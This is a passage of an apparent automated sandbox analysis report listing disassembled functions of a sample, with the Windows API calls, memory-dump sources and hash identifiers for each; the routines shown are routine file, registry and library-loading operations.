                                                                • Opcode ID: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                • Instruction ID: 5a19d233efad038c8b2c136f8d26bdd3a0ec8095e28a03ee1255231ebf4f6cbd
                                                                • Opcode Fuzzy Hash: 86e27237582d46cc27fb69e9d18ffd95bb16e48d37a40e9202ccf4fe55b5ead8
                                                                • Instruction Fuzzy Hash: 35E04F36B10105ABCB24CBA4ED848AE77A5AB88310764057BE502B32A0CA75AD51CF78
                                                                Function 0040665E Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                  • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                  • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                  • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID:
                                                                • API String ID: 2547128583-0
                                                                • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                Function 00405D55 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,?,0040595A,?,?,00000000,00405B30,?,?,?,?), ref: 00405D5A
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                • Instruction ID: a3d3d340e07fbe3a7a5d47ed685d46f7c513eabc37ca73d627b83f1c605c53fe
                                                                • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                • Instruction Fuzzy Hash: DFD0C972504820ABC6512728EF0C89BBB95DB542717028B35FAA9A22B0DB304C568A98
                                                                Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID:
                                                                • API String ID: 1375471231-0
                                                                • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: PathSearch
                                                                • String ID:
                                                                • API String ID: 2203818243-0
                                                                • Opcode ID: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                • Instruction ID: 264fbd039af9554c7d5279b05a8ebe462d94e5569cecf838bb527c95a897585a
                                                                • Opcode Fuzzy Hash: e786f414240c977d8527d6485e0b16ac48e4592c975100b70ba3c002947ce116
                                                                • Instruction Fuzzy Hash: FEE0DF72700100EBE710DFA4DE48EAB33A8DF40368B30823AF611B60D1E6B499419B3D
                                                                Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString
                                                                • String ID:
                                                                • API String ID: 1096422788-0
                                                                • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,: Completed,?), ref: 00406115
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID:
                                                                • API String ID: 71445658-0
                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                • Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
                                                                • Opcode Fuzzy Hash: 5f2b9645a280aa2e5618dda491c9c816a8b757916b71e5b574aff38626a5ba8c
                                                                • Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29
                                                                Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
